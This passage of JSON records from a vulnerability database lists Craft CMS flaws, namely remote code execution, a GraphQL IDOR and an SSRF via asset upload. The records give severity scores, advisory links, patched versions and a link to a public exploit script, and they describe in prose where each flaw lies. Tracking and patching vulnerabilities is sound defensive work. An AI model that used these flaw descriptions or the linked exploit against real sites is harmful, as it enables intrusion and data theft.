/C:H/I:H/A:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Act","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2026-03-20T15:24:23Z/"}],"url":"https://github.com/craftcms/cms/blob/3.x/CHANGELOG.md#3915---2025-04-10-critical"},{"reference_url":"https://github.com/craftcms/cms/blob/4.x/CHANGELOG.md#41415---2025-04-10-critical","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"c
vssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Act","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2026-03-20T15:24:23Z/"}],"url":"https://github.com/craftcms/cms/blob/4.x/CHANGELOG.md#41415---2025-04-10-critical"},{"reference_url":"https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5617---2025-04-10-critical","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Act","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2026-03-20T15:24:23Z/"}],"url":"https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5617---2025-04-10-critical"},{"reference_url":"https://github.com/craftcms/cms/commit/e1c85441fa47eeb7c688c2053f25419bc0547b47","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Act","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2026-03-20T15:24:23Z/"}],"url":"https://github.com/craftcms/cms/commit/e1c85441fa47eeb7c688c2053f25419bc0547b47"},{"reference_url":"https://sensepost.com/blog/2025/investigating-an-in-the-wild-campaign-using-rce-in-craftcms","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_eleme
nts":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://sensepost.com/blog/2025/investigating-an-in-the-wild-campaign-using-rce-in-craftcms"},{"reference_url":"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-32432","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-32432"},{"reference_url":"https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/multiple/webapps/52525.py","reference_id":"CVE-2025-32432","reference_type":"exploit","scores":[],"url":"https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/multiple/webapps/52525.py"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-32432","reference_id":"CVE-2025-32432","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-32432"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g","reference_id":"GHSA-4w8r-3xrw-v25g","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g"},{"reference_url":"https://github.com/advisories/GHSA-f3gw-9ww9-jmc3","reference_id":"GHSA-f3gw-9ww9-jmc3","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-f3gw-9ww9-jmc3"},{"reference_url":"https://github.com/craft
cms/cms/security/advisories/GHSA-f3gw-9ww9-jmc3","reference_id":"GHSA-f3gw-9ww9-jmc3","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Act","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2026-03-20T15:24:23Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-f3gw-9ww9-jmc3"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/84935?format=json","purl":"pkg:composer/craftcms/cms@5.6.17","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1468-4fdx-kbfr"},{"vulnerability":"VCID-1mb5-28xp-ckd2"},{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5mnd-qvaq-k3am"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-7y4f-ef7t-47eb"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-dbcz-erbe-u7dt"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-esma-wxje-eqh3"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-h6t5-pdp5-8qhe"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},
{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxet-d8ux-mkge"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rb7c-3nkc-gkeg"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-vvhc-rnpr-ubey"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.6.17"}],"aliases":["CVE-2025-32432","GHSA-f3gw-9ww9-jmc3"],"risk_score":10.0,"exploitability":"2.0","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qq68-3j4y-47am"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50604?format=json","vulnerability_id":"VCID-qywv-vf4r-8bh9","summary":"Craft CMS has IDOR via GraphQL @parseRefs\nThe GraphQL directive `@parseRefs`, intended to parse internal reference tags (e.g., `{user:1:email}`), can be abused by both authenticated users and unauthenticated guests (if a Public Schema is enabled) to access sensitive attributes of any element in the CMS. 
The implementation in `Elements::parseRefs` fails to perform authorization checks, allowing attackers to read data they are not authorized to view.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28696","reference_id":"","reference_type":"","scores":[{"value":"0.00024","scoring_system":"epss","scoring_elements":"0.07081","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28696"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/4d98a07e47580f1712095825d3e3c4d67bc9f8b9","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-04T18:00:48Z/"}],"url":"https://github.com/craftcms/cms/commit/4d98a07e47580f1712095825d3e3c4d67bc9f8b9"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28696","reference_id":"CVE-2026-28696","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28696"},{"reference_url":"https://github.com/advisories/GHSA-7x43-mpfg-r9wj","reference_id":"GHSA-7x43-mpfg-r9wj","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7x43
-mpfg-r9wj"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-7x43-mpfg-r9wj","reference_id":"GHSA-7x43-mpfg-r9wj","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-04T18:00:48Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-7x43-mpfg-r9wj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73952?format=json","purl":"pkg:composer/craftcms/cms@5.9.0-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-6ban-jvfq-w3at"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.0-beta.1"}],"aliases":["CVE-2026-28696","GHSA-7x43-mpfg-r9wj"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://pub
lic2.vulnerablecode.io/vulnerabilities/VCID-qywv-vf4r-8bh9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56504?format=json","vulnerability_id":"VCID-r5hp-5nju-9ubz","summary":"Craft CMS has a potential RCE with a compromised security key\nThis is an RCE vulnerability that affects Craft 4 and 5 installs where your security key has already been compromised.\n\nhttps://craftcms.com/knowledge-base/securing-craft#keep-your-secrets-secret\n\nAnyone running an unpatched version of Craft with a compromised security key is affected.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-23209","reference_id":"","reference_type":"","scores":[{"value":"0.1639","scoring_system":"epss","scoring_elements":"0.94998","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-23209"},{"reference_url":"https://craftcms.com/knowledge-base/securing-craft#keep-your-secrets-secret","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H/E:H"},{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Attend","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:N/T:T/P:M/B:A/M:M/D:A/2025-02-21T04:56:13Z/"}],"url":"https://craftcms.com/knowledge-base/securing-craft#keep-your-secrets-secret"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H/E:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/e59e22b30c9dd39e5e2c7fe02c147bcbd004e603","reference_id":"","reference_type":"","scores":[{"value":"8.0","sco
ring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H/E:H"},{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Attend","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:N/T:T/P:M/B:A/M:M/D:A/2025-02-21T04:56:13Z/"}],"url":"https://github.com/craftcms/cms/commit/e59e22b30c9dd39e5e2c7fe02c147bcbd004e603"},{"reference_url":"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-23209","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H/E:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-23209"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-23209","reference_id":"CVE-2025-23209","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H/E:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-23209"},{"reference_url":"https://github.com/advisories/GHSA-x684-96hh-833x","reference_id":"GHSA-x684-96hh-833x","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-x684-96hh-833x"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-x684-96hh-833x","reference_id":"GHSA-x684-96hh-833x","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H/E:H"},{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Attend","scoring_system":"ssvc","sc
oring_elements":"SSVCv2/E:A/A:N/T:T/P:M/B:A/M:M/D:A/2025-02-21T04:56:13Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-x684-96hh-833x"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/83867?format=json","purl":"pkg:composer/craftcms/cms@5.5.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1468-4fdx-kbfr"},{"vulnerability":"VCID-1mb5-28xp-ckd2"},{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5mnd-qvaq-k3am"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-7y4f-ef7t-47eb"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-dbcz-erbe-u7dt"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-esma-wxje-eqh3"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-h6t5-pdp5-8qhe"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jsfs-azcs-mfcm"},{"vulnerability":"VCID-jxet-d8ux-mkge"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qq68-3j4y-47am"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rb7c-3nkc-gkeg"},{"vulnerability":
"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-vvhc-rnpr-ubey"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.5.8"}],"aliases":["CVE-2025-23209","GHSA-x684-96hh-833x"],"risk_score":10.0,"exploitability":"2.0","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-r5hp-5nju-9ubz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/49561?format=json","vulnerability_id":"VCID-rb7c-3nkc-gkeg","summary":"Craft CMS vulnerable to Server-Side Request Forgery (SSRF) via GraphQL Asset Upload Mutation\nThe Craft CMS GraphQL `save_<VolumeName>_Asset` mutation is vulnerable to Server-Side Request Forgery (SSRF). This vulnerability arises because the `_file` input, specifically its `url` parameter, allows the server to fetch content from arbitrary remote locations without proper validation. Attackers can exploit this by providing internal IP addresses or cloud metadata endpoints as the `url`, forcing the server to make requests to these restricted services. The fetched content is then saved as an asset, which can subsequently be accessed and exfiltrated, leading to potential data exposure and infrastructure compromise. 
This exploitation requires specific GraphQL permissions for asset management within the targeted volume.\n\nUsers should update to the patched 5.8.21 and 4.16.17 releases to mitigate the issue. Note that a later advisory in this listing (CVE-2026-25493, fixed in 5.8.22) reports that the hostname/IP blocklist on the GraphQL asset mutation could be bypassed via HTTP redirects, which appears to be the same URL-fetch path; 5.8.21 alone should therefore not be treated as a complete SSRF fix for this mutation.\n\nReferences:\n\nhttps://github.com/craftcms/cms/commit/013db636fdb38f3ce5657fd196b6d952f98ebc52\n\nhttps://github.com/craftcms/cms/blob/5.x/CHANGELOG.md","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-68437","reference_id":"","reference_type":"","scores":[{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03989","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-68437"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04","reference_id":"","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"5.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-06T14:27:06Z/"}],"url":"https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04"},{"reference_url":"https://github.com/craftcms/cms/commit/013db636fdb38f3ce5657fd196b6d952f98ebc52","reference_id":"","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"5.0","scoring_system":"cvssv4
","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-06T14:27:06Z/"}],"url":"https://github.com/craftcms/cms/commit/013db636fdb38f3ce5657fd196b6d952f98ebc52"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-68437","reference_id":"CVE-2025-68437","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-68437"},{"reference_url":"https://github.com/advisories/GHSA-x27p-wfqw-hfcc","reference_id":"GHSA-x27p-wfqw-hfcc","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-x27p-wfqw-hfcc"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-x27p-wfqw-hfcc","reference_id":"GHSA-x27p-wfqw-hfcc","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"5.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-06T14:27:06Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-x27p-wfqw-hfcc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73169?format=json","purl":"pkg:composer/craftcms/cms@5.8.21","is_vulnerable":true,"affected_by_vulnerabilitie
s":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-esma-wxje-eqh3"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-vvhc-rnpr-ubey"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.21"}],"aliases":["CVE-2025-68437","GHSA-x27p-wfqw-hfcc"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities
